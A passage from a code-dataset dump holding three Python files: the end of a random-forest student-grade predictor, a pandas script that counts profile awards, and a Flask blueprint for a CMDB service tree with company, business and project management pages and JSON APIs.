transposed[2][i] = 2\n if transposed[2][i] == 'C':\n transposed[2][i] = 3\n if transposed[2][i] == 'D':\n transposed[2][i] = 4\n if transposed[2][i] == 'E':\n transposed[2][i] = 5\n if transposed[2][i] == 'F':\n transposed[2][i] = 6\n\n\ndef convert_to_number(data_of_interest, transpose, idx, str_1, str_2, str_3):\n for i in range(0, data_of_interest.shape[0]):\n if transpose[idx][i] == str_1:\n transpose[idx][i] = 1\n if transpose[idx][i] == str_2:\n transpose[idx][i] = 2\n if transpose[idx][i] == str_3:\n transpose[idx][i] = 3\n\n\ndef convert():\n covert_grade_to_number(initial_training_data, initial_transposed_training_data)\n covert_grade_to_number(initial_testing_data, initial_transposed_testing_data)\n convert_to_number(initial_training_data, initial_transposed_training_data, 3, 'never', 'rarely', 'frequently')\n convert_to_number(initial_training_data, initial_transposed_training_data, 4, 'never', 'sometimes', 'always')\n convert_to_number(initial_training_data, initial_transposed_training_data, 5, 'never', 'rarely', 'always')\n convert_to_number(initial_testing_data, initial_transposed_testing_data, 3, 'never', 'rarely', 'frequently')\n convert_to_number(initial_testing_data, initial_transposed_testing_data, 4, 'never', 'sometimes', 'always')\n convert_to_number(initial_testing_data, initial_transposed_testing_data, 5, 'Never', 'Sometimes', 'Yes')\n\n\nconvert()\n\ntraining_data_conv = pd.DataFrame(initial_transposed_training_data.transpose(), columns=TITLES_INITIAL_TRAINING_DATA)\ntesting_data_conv = pd.DataFrame(initial_transposed_testing_data.transpose(), columns=TITLES_INITIAL_TESTING_DATA)\ntesting_data_conv = \\\n testing_data_conv[['STUDENTID', 'SCORE', 'GRADE', 'ASKS_QUESTIONS', 'ON_SMARTPHONE', 'LATE_IN_CLASS']]\n\n# find span of scores for given grade\ngrade_score_df = training_data_conv[['SCORE']].join(training_data_conv[['GRADE']])\nscore_for_grade_c = grade_score_df.query(\"GRADE == 3\")\nprint(score_for_grade_c)\nprint('minimal score for grade C')\nprint(score_for_grade_c['SCORE'].min)\n\n# plot the data\ngrade_vs_score = training_data_conv.plot(x='SCORE', y='GRADE', style='o')\nplt.ylabel('GRADE')\nplt.show()\n\n# split into independent and dependent variables\nfinal_training_data = training_data_conv.drop(columns=['GRADE'])\nlabels_training_data = training_data_conv[['GRADE']]\nfinal_testing_data = testing_data_conv.drop(columns=['GRADE'])\nlabels_testing_data = testing_data_conv[['GRADE']]\n\n\n# split into training and validation set\nX_train, X_val, y_train, y_val = \\\n train_test_split(final_training_data.values, labels_training_data.values, test_size=0.05, random_state=1)\n\n\n# create a random forest model\nmodel = RandomForestClassifier(n_estimators=300, n_jobs=-1, random_state=0, oob_score=True)\nmodel.fit(X_train, np.ravel(y_train.astype('int')))\n\n# prediction on the validation set\nprediction = model.predict(X_val)\nprint(prediction)\nprint(np.ravel(y_val))\n\ndifference_predicted_true = prediction - np.ravel(y_val)\nincorrect_predictions = list(filter(lambda x: x != 0, difference_predicted_true))\npercentage_correctly_classified = 1 - np.size(incorrect_predictions) / np.size(difference_predicted_true)\nprint(percentage_correctly_classified)\n\n# apply the model to the test set and create a dataframe with these predictions\ntest_prediction = model.predict(final_testing_data.values)\npredicted_grades_df = pd.DataFrame(test_prediction, columns=['PREDICTED_GRADE'])\ntest_data_with_predictions = final_testing_data.join(predicted_grades_df)\n\nprint(test_data_with_predictions.head())\ngrade_vs_score_test = test_data_with_predictions.plot(x='SCORE', y='PREDICTED_GRADE', style='o')\nplt.ylabel('PREDICTED_GRADE')\nplt.show()\n\n","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":4939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"71833710","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 8 13:44:39 2017\n\n@author: yuchenli\n\"\"\"\n\nimport pandas as pd\naward = pd.read_csv(\"/Users/yuchenli/Box Sync/Yuchen_project/Truven_rising_stars/profile_awards/profile_awards.csv\", sep = \",\", encoding = 'ISO-8859-1')\n\naward_count = dict()\nfor i in range(len(award)):\n key = award.loc[i,\"HBE_ID\"]\n if key not in award_count:\n award_count[key] = 1\n else:\n award_count[key] += 1\n \n# Mark KOL among Report-Tags\nname_standard = pd.read_csv(\"/Users/yuchenli/Box Sync/Yuchen_project/Truven_rising_stars/education_manual_annotation/Profile_Education_Institution_Standard_UTF-8.csv\", sep = \",\", encoding = 'ISO-8859-1')\ntarget = pd.read_csv(\"/Users/yuchenli/Box Sync/Yuchen_project/Truven_rising_stars/education_manual_annotation/profile_education_Report-Tags.csv\", sep = \",\", encoding = 'utf-8')\n\nKOL_Report_Tags = dict()\nKOL_HBE_ID_set = set(name_standard.loc[:,'HBE_ID'])\n\nfor i in set(target.loc[:,'HBE_ID']):\n if i in KOL_HBE_ID_set:\n KOL_Report_Tags[i] = 1\n else:\n KOL_Report_Tags[i] = 0\n\n# Write to csv\nimport csv\nwith open(\"/Users/yuchenli/Box Sync/Yuchen_project/Truven_rising_stars/profile_awards/awards_count.csv\", \"w\") as csvfile:\n fieldnames = ['HBE_ID', \"awards_count\", \"KOL\"]\n writer = csv.DictWriter(csvfile, fieldnames = fieldnames)\n writer.writeheader()\n for key, value in award_count.items():\n try:\n writer.writerow({'HBE_ID': key, \"awards_count\": value, \"KOL\": KOL_Report_Tags[key]})\n except:\n pass","sub_path":"profile_awards/profile_awards.py","file_name":"profile_awards.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"476074376","text":"# -*- coding: UTF-8 -*-\nimport sys\nimport json\nimport re\nimport copy\n\nreload(sys)\nsys.setdefaultencoding(\"utf8\")\n\n\nfrom flask import Blueprint,render_template,request,jsonify,redirect,make_response,url_for\nfrom modules import conf\nfrom modules import relationship as cmdb\nfrom modules import logs\nfrom modules import auths as _users\np = _users.Permission()\n\nb_service_tree = Blueprint('b_service_tree', __name__)\n\nlog = logs.Loger()\napplications = cmdb.OpsApplications()\n\n\n'''服务树 公司管理方法类 '''\n@b_service_tree.route('/st_company',methods=['POST', 'GET'])\n@p.is_login\n@p.is_user_view\n@p.is_sys_admin\ndef st_company():\n result = {}\n c = cmdb.OpsSubCompany()\n\n\n # 删除的时候传参过来的东西\n status = request.values.get(\"status\", \"\")\n message = request.values.get(\"message\", \"\")\n if status.isdigit():\n result = {\"code\":int(status),\"message\":message}\n\n # Search\n key = request.values.get(\"key\",\"\").strip()\n if key:\n companys = c.select_rows(key=key)\n return render_template(\"st_company.html\", companys=companys, key=key, result=result)\n else:\n redirect(\"/st_companys\")\n\n companys = c.select_rows()\n\n return render_template(\"st_company.html\", companys=companys, result=result)\n\n@b_service_tree.route('/st_company_add', methods=['POST', 'GET'])\n@p.is_login\n@p.is_user_view\n@p.is_sys_admin\ndef st_company_add():\n result={}\n c = cmdb.OpsSubCompany()\n username = request.cookies.get(\"username\", \"\").strip()\n\n name = request.form.get(\"company\",\"\").strip()\n owner = request.form.get(\"owner\",\"\").strip()\n remark = request.form.get(\"remark\",\"\").strip()\n en_name = request.form.get(\"en_name\", \"\").strip()\n\n if name and owner:\n if not re.match('^[A-Za-z0-9]+$', en_name): # 验证en_name\n result = {\"code\": 1, \"message\": \"英文名规则不对\"}\n else:\n if c.insert_vs(name, owner, remark, en_name):\n result = {\"code\":0,\"message\":\"添加成功\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:添加公司:{0}\".format(name),1)\n else:\n result = {\"code\":1,\"message\":\"写入数据出错,是否公司名称重复。\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:添加公司:{0}\".format(name),0)\n\n #获取用户列表\n users = cmdb.users()\n return render_template(\"st_company_add.html\",result=result,users=users)\n\n@b_service_tree.route('/st_company_update', methods=['POST', 'GET'])\n@p.is_login\n@p.is_user_view\n@p.is_sys_admin\ndef st_company_update():\n result = {}; company = {}\n username = request.cookies.get(\"username\", \"\")\n\n c = cmdb.OpsSubCompany()\n\n id = request.values.get(\"id\")\n name = request.form.get(\"company\",\"\").strip()\n owner = request.form.get(\"owner\",\"\").strip()\n remark = request.form.get(\"remark\",\"\").strip()\n en_name = request.form.get(\"en_name\", \"\").strip()\n\n if id and name and owner and en_name: # 更新\n params = {\"id\":id}\n record = {\n \"name\":name,\n \"owner\":owner,\n \"remark\":remark,\n \"en_name\": en_name,\n }\n if not re.match('^[A-Za-z0-9]+$', en_name): # 验证en_name\n result = {\"code\": 1, \"message\": \"英文名规则不对\"}\n else:\n if c.update_vs(params=params,record=record):\n result = {\"code\":0,\"message\":\"更新成功\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:更新公司:{0}\".format(name),1)\n else:\n result = {\"code\":1,\"message\":\"更新数据出错\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:更新公司:{0}\".format(name),0)\n\n else:\n company = [] #init company\n if id:\n record = [\"id\",\"name\",\"owner\",\"remark\",\"en_name\"]\n params = {\"id\":id}\n company = c.select(record=record,params=params)\n if company: company= company[0]\n\n #获取用户列表\n users = cmdb.users()\n return render_template(\"st_company_update.html\",result=result, company=company, users=users)\n\n@b_service_tree.route('/st_company_delete', methods=['POST', 'GET'])\n@p.is_login\n@p.is_user_view\n@p.is_sys_admin\ndef st_company_delete():\n c = cmdb.OpsSubCompany()\n username = request.cookies.get(\"username\", \"\")\n\n id = request.values.get(\"id\",\"\")\n name = request.values.get(\"name\",\"\")\n if id:\n if c.delete_vs(companyid=id):\n result = {\"code\":0,\"message\":\"删除成功\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:删除公司:{0}\".format(name),1)\n else:\n result = {\"code\":1,\"message\":\"删除失败,请先删除该[ {name} ]公司下的业务\".format(name=name)}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:删除公司:{0}\".format(name),0)\n else:\n result = {\"code\":1,\"message\":\"参数不全\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:删除公司:{0}:参数不全\".format(name),0)\n return redirect(url_for(\"b_service_tree.st_company\",\n status = result.get(\"code\", \"\"),\n message= result.get(\"message\",\"\")))\n\n@b_service_tree.route('/st_company_dash', methods=['POST', 'GET'])\n@p.is_login\ndef st_company_dash():\n c = cmdb.OpsSubCompany(); dashs={}; result={} # init Vars\n company_id = request.values.get(\"company_id\", 0)\n if company_id:\n dashs = c.dash(company_id)\n else:\n result = {\"code\":1, \"message\":\"未提供公司的ID号\"}\n\n\n return render_template(\"st_company_dash.html\", dashs=dashs, result=result)\n\n'''服务树 业务管理方法类 '''\n@b_service_tree.route('/st_business', methods=['POST', 'GET']) # serviceTree company\n@p.is_login\n@p.is_user_view\ndef st_business():\n result = {} ; business=[] # init var\n c = cmdb.OpsBusiness()\n\n\n # 删除的时候传参过来的东西\n status = request.values.get(\"status\", \"\")\n message = request.values.get(\"message\", \"\")\n if status.isdigit():\n result = {\"code\":int(status),\"message\":message}\n\n # 专项 Search\n business_name = request.values.get(\"business_name\",\"\").strip()\n company_name = request.values.get(\"company_name\",\"\").strip()\n business_id = request.values.get(\"business_id\",\"\").strip()\n\n if company_name or business_name or business_id:\n if company_name:\n business = c.select_rows(sub_company_name=company_name)\n elif business_name:\n business = c.select_rows(business_name=business_name)\n elif business_id:\n business = c.select_rows(businessid=business_id)\n else:\n redirect(\"/st_business\")\n return render_template(\"st_business.html\", business=business, business_name=business_name, result=result)\n\n\n # Search\n key = request.values.get(\"key\", \"\").strip()\n if key:\n business = c.select_rows(key=key)\n return render_template(\"st_business.html\", business=business, key=key, result=result)\n\n #返回给前端获取数据,GET.\n #record = [\"id\",\"name\",\"sub_company_id\",\"sub_company_name\",\"owner\",\"opser\",\"developers\",\"create_at\",\"remark\"]\n business = c.select_rows()\n return render_template(\"st_business.html\", business=business, result=result)\n\n@b_service_tree.route('/st_business_add', methods=['POST', 'GET']) # serviceTree company\n@p.is_login\n@p.is_user_view\ndef st_business_add():\n result = {} ; business=[] # init var\n c = cmdb.OpsBusiness()\n username = request.cookies.get(\"username\",\"\")\n\n name = request.form.get(\"business\",\"\").strip()\n sub_company_id = request.form.get(\"sub_company_id\",\"\").strip()\n owner = request.form.get(\"owner\",\"\").strip()\n opser = request.form.get(\"opser\",\"\").strip()\n developers = request.form.get(\"developers\",\"\").strip()\n remark = request.form.get(\"remark\",\"\").strip()\n en_name = request.form.get(\"en_name\", \"\").strip()\n\n if name and sub_company_id and owner and opser and developers and en_name:\n if not re.match('^[A-Za-z0-9]+$', en_name): # 验证en_name\n result = {\"code\": 1, \"message\": \"英文名规则不对\"}\n else:\n if c.insert_vs(name,sub_company_id,owner,opser,developers,remark,en_name):\n result = {\"code\":0,\"message\":\"添加成功\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:添加业务:{0}\".format(name),1)\n else:\n result = {\"code\":1,\"message\":\"写入数据出错\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:添加业务:{0}\".format(name),0)\n else:\n log.write(username,\"serviceTree\",\"服务树:业务线管理:添加业务:{0}:参数不全\".format(name),0)\n #result = {\"code\":1,\"message\":\"参数不全\"}\n\n ops_sub_company = cmdb.OpsSubCompany()\n record = [\"id\",\"name\"]\n companys = ops_sub_company.select(record=record,params={})\n\n #获取用户列表\n users = cmdb.users()\n return render_template(\"st_business_add.html\",result=result, companys=companys, users=users)\n\n@b_service_tree.route('/st_business_update', methods=['POST', 'GET']) # serviceTree company\n@p.is_login\n@p.is_user_view\ndef st_business_update():\n result = {} ; business=[] # init var\n c = cmdb.OpsBusiness()\n username = request.cookies.get(\"username\", \"\")\n\n name = request.form.get(\"business\",\"\").strip()\n sub_company_id = request.form.get(\"sub_company_id\",\"\").strip()\n owner = request.form.get(\"owner\",\"\").strip()\n opser = request.form.get(\"opser\",\"\").strip()\n developers = request.form.get(\"developers\",\"\").strip()\n remark = request.form.get(\"remark\",\"\").strip()\n en_name = request.form.get(\"en_name\", \"\").strip()\n\n id = request.values.get(\"id\",\"\")\n if id and name and owner and opser and developers and sub_company_id and en_name:\n params = {\"id\":id}\n record = {\n \"name\":name,\n \"sub_company_id\":sub_company_id,\n \"owner\":owner,\n \"opser\":opser,\n \"developers\":developers,\n \"remark\":remark,\n \"en_name\" : en_name,\n }\n if not re.match('^[A-Za-z0-9]+$', en_name): # 验证en_name\n result = {\"code\": 1, \"message\": \"英文名规则不对\"}\n else:\n if c.update_vs(params=params,record=record):\n result = {\"code\":0,\"message\":\"更新成功\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:修改业务:{0}\".format(name),1)\n else:\n result = {\"code\":1,\"message\":\"更新数据出错\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:修改业务:{0}\".format(name),0)\n elif id:\n record = [\"id\",\"name\",\"sub_company_id\",\"owner\",\"opser\",\"developers\",\"remark\",\"en_name\"]\n params = {\"id\":id}\n business = c.select(record=record,params=params)\n if business: business= business[0]\n\n # get companys to static\n ops_sub_company = cmdb.OpsSubCompany()\n record = [\"id\",\"name\"]\n companys = ops_sub_company.select(record=record,params={})\n\n #获取用户列表\n users = cmdb.users()\n return render_template(\"st_business_update.html\",result=result, companys=companys,\n business=business,users=users)\n\n@b_service_tree.route('/st_business_delete', methods=['POST', 'GET']) # serviceTree company\n@p.is_login\n@p.is_user_view\ndef st_business_delete():\n result = {} ; business=[] # init var\n c = cmdb.OpsBusiness()\n username = request.cookies.get(\"username\", \"\")\n\n id = request.values.get(\"id\",\"\")\n name = request.values.get(\"name\",\"\")\n if id:\n if c.delete_vs(business_id=id):\n result = {\"code\":0,\"message\":\"删除成功\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:删除业务:{0}\".format(name),1)\n else:\n result = {\"code\":1,\"message\":\"删除失败,请先删除该[ {name} ]业务下的项目\".format(name=name)}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:删除业务:{0}\".format(name),0)\n else:\n result = {\"code\":1,\"message\":\"参数不全\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:删除业务:{0}:参数不全\".format(name),0)\n return redirect(url_for(\"b_service_tree.st_business\",\n status = result.get(\"code\", \"\"),\n message= result.get(\"message\",\"\")))\n\n@b_service_tree.route('/st_business_dash', methods=['POST', 'GET'])\n@p.is_login\ndef st_business_dash():\n b = cmdb.OpsBusiness(); dashs={}; result={} # init Vars\n business_id = request.values.get(\"business_id\", 0)\n if business_id:\n dashs = b.dash(business_id)\n else:\n result = {\"code\":1, \"message\":\"未提供业务的ID号\"}\n\n return render_template(\"st_business_dash.html\", result=result, dashs=dashs)\n\n\n@b_service_tree.route('/st_project',methods=['POST', 'GET']) # serviceTree company\n@p.is_login\n@p.is_user_view\ndef st_project():\n result = {}; projects={} # init Vars\n c = cmdb.OpsProject()\n\n # 删除的时候传参过来的东西\n status = request.values.get(\"status\", \"\")\n message = request.values.get(\"message\", \"\")\n if status.isdigit():\n result = {\"code\":int(status),\"message\":message}\n\n # 项 Search\n project_name = request.values.get(\"project_name\",\"\").strip()\n project_id = request.values.get(\"project_id\",\"\").strip()\n if project_name or project_id:\n if project_id:\n projects = c.select_rows(projectid=project_id)\n else:\n projects = c.select_rows(project_name=project_name)\n\n return render_template(\"st_project.html\", projects=projects, project_name=project_name, result=result)\n\n # Search\n key = request.values.get(\"key\", \"\").strip()\n if key:\n projects = c.select_rows(key=key)\n return render_template(\"st_project.html\", projects=projects, key=key, result=result)\n\n #返回给前端获取数据,GET.\n #record = p.id,p.name,c.id AS sub_company_id,c.name as sub_company_name,b.id AS business_id,\n # b.name AS business_name, p.owner,p.opser,p.developers,p.create_at,p.remark\n projects = c.select_rows()\n return render_template(\"st_project.html\", projects=projects, result=result)\n\n@b_service_tree.route('/st_project_add',methods=['POST', 'GET']) # serviceTree company\n@p.is_login\n@p.is_user_view\ndef st_project_add():\n result = {} # init var\n c = cmdb.OpsProject()\n username = request.cookies.get(\"username\", \"\")\n\n name = request.form.get(\"project\",\"\").strip()\n sub_company_id = request.form.get(\"sub_company_id\", \"\").strip()\n business_id = request.form.get(\"business_id\",\"\").strip()\n owner = request.form.get(\"owner\",\"\").strip()\n opser = request.form.get(\"opser\",\"\").strip()\n developers = request.form.get(\"developers\",\"\").strip()\n remark = request.form.get(\"remark\",\"\").strip()\n en_name = request.form.get(\"en_name\", \"\").strip()\n\n if name and business_id and owner and opser and developers and en_name:\n if not re.match('^[A-Za-z0-9]+$', en_name): # 验证en_name\n result = {\"code\": 1, \"message\": \"英文名规则不对\"}\n else:\n if c.insert_vs(name,business_id,sub_company_id,owner,opser,developers,remark, en_name):\n result = {\"code\":0,\"message\":\"添加成功\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:添加项目:{0}\".format(name),1)\n else:\n result = {\"code\":1,\"message\":\"写入数据出错\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:添加项目:{0}\".format(name),0)\n else:\n pass\n #result = {\"code\":1,\"message\":\"参数不全\"}\n\n #返回公司,然后前端根据选定的公司ID利用Jquery去查接口获取公司下面的业务\n ops_sub_company = cmdb.OpsSubCompany()\n record = [\"id\",\"name\"]\n companys = ops_sub_company.select(record=record,params={})\n\n #获取用户列表\n users = cmdb.users()\n return render_template(\"st_project_add.html\",result=result, companys=companys, users=users)\n\n@b_service_tree.route('/st_project_update',methods=['POST', 'GET']) # serviceTree company\n@p.is_login\n@p.is_user_view\ndef st_project_update():\n result = {}; business=[]; projects=[] # init var\n username = request.cookies.get(\"username\", \"\")\n\n c = cmdb.OpsProject()\n\n name = request.form.get(\"project\",\"\").strip()\n business_id = request.form.get(\"business_id\",\"\").strip()\n owner = request.form.get(\"owner\",\"\").strip()\n opser = request.form.get(\"opser\",\"\").strip()\n developers = request.form.get(\"developers\",\"\").strip()\n remark = request.form.get(\"remark\",\"\").strip()\n en_name = request.form.get(\"en_name\", \"\").strip()\n\n\n id = request.values.get(\"id\",\"\")\n if id and name and owner and opser and developers and business_id and en_name:\n params = {\"id\":id}\n record = {\n \"name\":name,\n \"business_id\":business_id,\n \"owner\":owner,\n \"opser\":opser,\n \"developers\":developers,\n \"remark\":remark,\n \"en_name\" : en_name,\n }\n if not re.match('^[A-Za-z0-9]+$', en_name): # 验证en_name\n result = {\"code\": 1, \"message\": \"英文名规则不对\"}\n else:\n if c.update_vs(params=params,record=record):\n result = {\"code\":0,\"message\":\"更新成功\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:更新项目:{0}\".format(name),1)\n else:\n result = {\"code\":1,\"message\":\"更新数据出错\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:更新项目:{0}\".format(name),0)\n elif id:\n #返回给前端获取数据,GET.\n #record = p.id,p.name,c.id AS sub_company_id,c.name as sub_company_name,b.id AS business_id,\n # b.name AS business_name, p.owner,p.opser,p.developers,p.create_at,p.remark\n projects = c.select_rows(projectid=id)\n if projects:\n projects= projects[0]\n sub_company_id = projects[2]\n ops_business = cmdb.OpsBusiness()\n params = {\"sub_company_id\":sub_company_id}\n record = [\"id\",\"name\"]\n business = ops_business.select(params=params,record=record)\n\n # get companys to static\n ops_sub_company = cmdb.OpsSubCompany()\n record = [\"id\",\"name\"]\n companys = ops_sub_company.select(record=record,params={})\n\n #获取用户列表\n users = cmdb.users()\n return render_template(\"st_project_update.html\",result=result, companys=companys,\n business=business, projects=projects, users=users)\n\n\n@b_service_tree.route('/st_project_delete',methods=['POST', 'GET']) # serviceTree company\n@p.is_login\n@p.is_user_view\ndef st_project_delete():\n result = {}; business=[]; projects=[] # init var\n c = cmdb.OpsProject()\n username = request.cookies.get(\"username\", \"\")\n\n id = request.values.get(\"id\",\"\")\n name = request.values.get(\"name\",\"\")\n if id:\n if c.delete_vs(project_id=id):\n result = {\"code\":0,\"message\":\"删除成功\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:删除项目:{0}\".format(name),1)\n else:\n result = {\"code\":1,\"message\":\"删除失败,请先删除该[ {name} ]项目下的机器\".format(name=name)}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:删除项目:{0}\".format(name),0)\n else:\n result = {\"code\":1,\"message\":\"参数不全\"}\n log.write(username,\"serviceTree\",\"服务树:业务线管理:删除项目:{0}:参数不全\".format(name),0)\n\n return redirect(url_for(\"b_service_tree.st_project\",\n status = result.get(\"code\", \"\"),\n message= result.get(\"message\",\"\")))\n\n@b_service_tree.route('/st_project_dash', methods=['POST', 'GET'])\n@p.is_login\ndef st_project_dash():\n p = cmdb.OpsProject(); dashs={}; result={} # init Vars\n project_id = request.values.get(\"project_id\", 0)\n if project_id:\n dashs = p.dash(project_id)\n else:\n result = {\"code\":1, \"message\":\"未提供项目的ID号\"}\n\n return render_template(\"st_project_dash.html\", result=result, dashs=dashs)\n\n\n'''Applications'''\n@b_service_tree.route('/st_applications', methods=['POST', 'GET'])\ndef st_applications():\n '''返回应用信息'''\n key = request.values.get('key', \"\")\n push_type = request.values.get('push_type', \"\")\n\n if request.method == 'POST':\n pass\n\n data = applications.select(key, push_type)\n return render_template('st_applications.html', data=data)\n\n\n'''Stree'''\n@b_service_tree.route('/st_service_tree') #API获取公司名下的业务\n@p.is_login\n@p.is_user_view\ndef st_service_tree():\n return render_template(\"st_service_tree.html\")\n\n@b_service_tree.route('/st_service_newtree')\ndef st_service_newtree():\n return render_template(\"st_new_tree.html\")\n\n'''需求方不需要应用管理'''\n# @b_service_tree.route('/st_application',methods=['POST', 'GET']) # serviceTree company\n# @test_login\n# def st_application(username):\n# result = {\n# \"data\" :{\n# \"applications\" : [\n# (1,\"zabbix-server\",1,\"沈龙\",\"左文洪\",\"赵阳\",\"2017-08-08 09:00:00\",\"无备注\"),\n# (1,\"zabbix-mysql\",1,\"沈龙\",\"左文洪\",\"赵阳\",\"2017-08-08 09:00:00\",\"无备注\"),\n# (1,\"falcon-trasfer\",1,\"沈龙\",\"左文洪\",\"赵阳\",\"2017-08-08 09:00:00\",\"无备注\"),\n# ],\n# },\n# }\n# return render_template(\"st_application.html\", result=result)\n\n\n'''API'''\n\n@b_service_tree.route('/api/st_get_companys') #API获取公司列表\n@p.is_login\ndef api_st_get_companys():\n # /api/st_get_companys\n c = cmdb.OpsSubCompany()\n record = [\"id\", \"name\"]\n companys = c.select(record=record)\n result = {\n \"code\": 0,\n \"message\": \"success\",\n \"data\" : {\n \"companys\" : companys,\n },\n }\n return jsonify(result)\n\n@b_service_tree.route('/api/st_get_bussiness') #API获取公司名下的业务\n@p.is_login\ndef api_st_get_bussiness():\n # /api/st_get_bussiness?company_id=4\n id = request.values.get(\"company_id\",\"\")\n if not id:\n result = {\"code\":1,\"message\":\"请输入公司ID\"}\n return jsonify(result)\n\n c = cmdb.OpsBusiness()\n params = {\"sub_company_id\":id}\n record = [\"id\",\"name\"]\n business = c.select(params=params,record=record)\n if not business:\n result = {\"code\":1,\"message\":\"无公司或公司下无业务\"}\n return jsonify(result)\n\n result = {\n \"code\": 0,\n \"message\": \"success\",\n \"data\" : {\n \"business\" : business,\n },\n }\n return jsonify(result)\n\n@b_service_tree.route('/api/st_get_projects') #API获取公司名下的业务\n@p.is_login\ndef api_st_get_projects():\n # /api/st_get_projects?business_id=4\n id = request.values.get(\"business_id\",\"\")\n if not id:\n result = {\"code\":1,\"message\":\"请输入业务ID\"}\n return jsonify(result)\n\n c = cmdb.OpsProject()\n params = {\"business_id\":id}\n record = [\"id\",\"name\"]\n projects = c.select(params=params,record=record)\n if not projects:\n result = {\"code\":1,\"message\":\"无公司或公司下无业务\"}\n return jsonify(result)\n\n result = {\n \"code\": 0,\n \"message\": \"success\",\n \"data\" : {\n \"projects\" : projects,\n },\n }\n return jsonify(result)\n\n\ndef make_bussiness_tree(data,cindex,company_id,ops_business,ops_project,ops_machine):\n '''\n 生成公司下的业务线树形结构\n :param data: 用来生成树形结构的list\n :param cindex: 索引\n :param company_id: 数据库中公司id\n :param ops_business: cmdb.OpsBusiness()对象\n :param ops_project: cmdb.OpsProject()对象\n :param ops_machine: cmdb.OpsMachineInfo()对象\n :return:\n '''\n # 获取company_id下的业务\n record = [\"id\", \"name\"]\n parmas = {\"sub_company_id\": company_id}\n business = ops_business.select(record=record, params=parmas)\n # print company_id,business #每个公司ID对应的业务==>73 ((562, u'\\u4fdd\\u9669'),)\n\n for bindex, (business_id, business_name) in enumerate(business):\n data[cindex][\"children\"].append({\"text\": business_name, \"children\": []})\n # 获取业务下的项目\n record = [\"id\", \"name\"]\n params = {\"business_id\": business_id}\n projects = ops_project.select(record=record, params=params)\n # print business_id,projects #每个业务线ID对应的项目==>562 ((681, u'\\u4fdd\\u9669'),)\n for pindex, (project_id, project_name) in enumerate(projects):\n # 项目级\n data[cindex][\"children\"][bindex][\"children\"].append({\"text\": project_name, \"children\": []})\n record = [\"id\", \"machine_name\", \"in_ip\", \"modules_use\", \"owner\"]\n parmas = {\"project_id\": project_id}\n machines = ops_machine.select(record=record, params=parmas)\n # print project_id,machines #每个项目ID对应主机\n if machines:\n for machine_id, machine_name, in_ip, modules_use, owner in machines:\n # 主机级\n # 生成主机标签\n text = \"\\\n {1}({0})\\t\".format(owner,\n in_ip,\n machine_id, )\n if modules_use:\n for ser in modules_use.split(\",\"):\n text += \"{0}\".format(ser)\n\n data[cindex][\"children\"][bindex][\"children\"][pindex][\"children\"].append(\n {\"icon\": \"jstree-file\", \"text\": text})\n\n\n@b_service_tree.route('/api/st_get_tree') #API获取公司名下的业务\n@p.is_login\ndef api_st_get_tree():\n # /api/st_get_projects?business_id=4\n result = {\n 'code' : 0,\n 'message' : \"success\",\n 'core' : {\n\t\t\t'data' : [\n\t\t\t\t{\n\t\t\t\t\t\"text\" : \"国美\",\n\t\t\t\t\t\"state\" : { \"opened\" : True },\n\t\t\t\t\t\"children\" : [\n\t\t\t\t\t\t# {\n\t\t\t\t\t\t# \t\"text\" : \"Child node 1\",\n\t\t\t\t\t\t# \t\"state\" : { \"selected\" : true },\n\t\t\t\t\t\t# \t\"icon\" : \"jstree-file\"\n\t\t\t\t\t\t# },\n\t\t\t\t\t\t# { \"text\" : \"Child node 2\", \"state\" : { \"disabled\" : true } }\n\t\t\t\t\t]\n\t\t\t\t},\n\n {\n \"text\": \"其它\",\n \"state\": {\"opened\": True},\n \"children\": [\n # {\n # \t\"text\" : \"Child node 1\",\n # \t\"state\" : { \"selected\" : true },\n # \t\"icon\" : \"jstree-file\"\n # },\n # { \"text\" : \"Child node 2\", \"state\" : { \"disabled\" : true } }\n ]\n }\n\t\t\t]\n\t\t}\n }\n # {公司[{业务}[{项目}]]}\n\n ops_sub_company = cmdb.OpsSubCompany()\n ops_business = cmdb.OpsBusiness()\n ops_project = cmdb.OpsProject()\n ops_machine = cmdb.OpsMachineInfo()\n\n record = [\"id\",\"name\",\"has_server\"]\n companys = ops_sub_company.select(record=record)\n # print(len(companys),companys) # 12个\n data_gome = result[\"core\"][\"data\"][0][\"children\"] # 国美\n data_other = result[\"core\"][\"data\"][1][\"children\"] # 其它\n\n for cindex,(company_id, company_name,has_server) in enumerate(companys):\n\n if not has_server: # 如果公司不是\"国美\"\n # 添加到国美\n data_gome.append({\"text\":company_name, \"children\":[]})\n # 添加业务线到公司\n make_bussiness_tree(data_gome, cindex, company_id, ops_business, ops_project, ops_machine)\n # 添加到其它\n data_other.append({\"text\": company_name, \"children\": []})\n #make_bussiness_tree(data_other, cindex, company_id, ops_business, ops_project, ops_machine)\n\n else: # 如果公司是\"国美\"\n # 添加到国美\n data_gome.append({\"text\":company_name, \"children\":[]})\n # 添加业务线到公司\n make_bussiness_tree(data_gome, cindex, company_id, ops_business, ops_project, ops_machine)\n # 去掉\"国美\"中重复添加的公司\n result[\"core\"][\"data\"][0][\"children\"] = [i for i in data_gome if i not in data_other]\n\n result2 = copy.deepcopy(result)\n data = 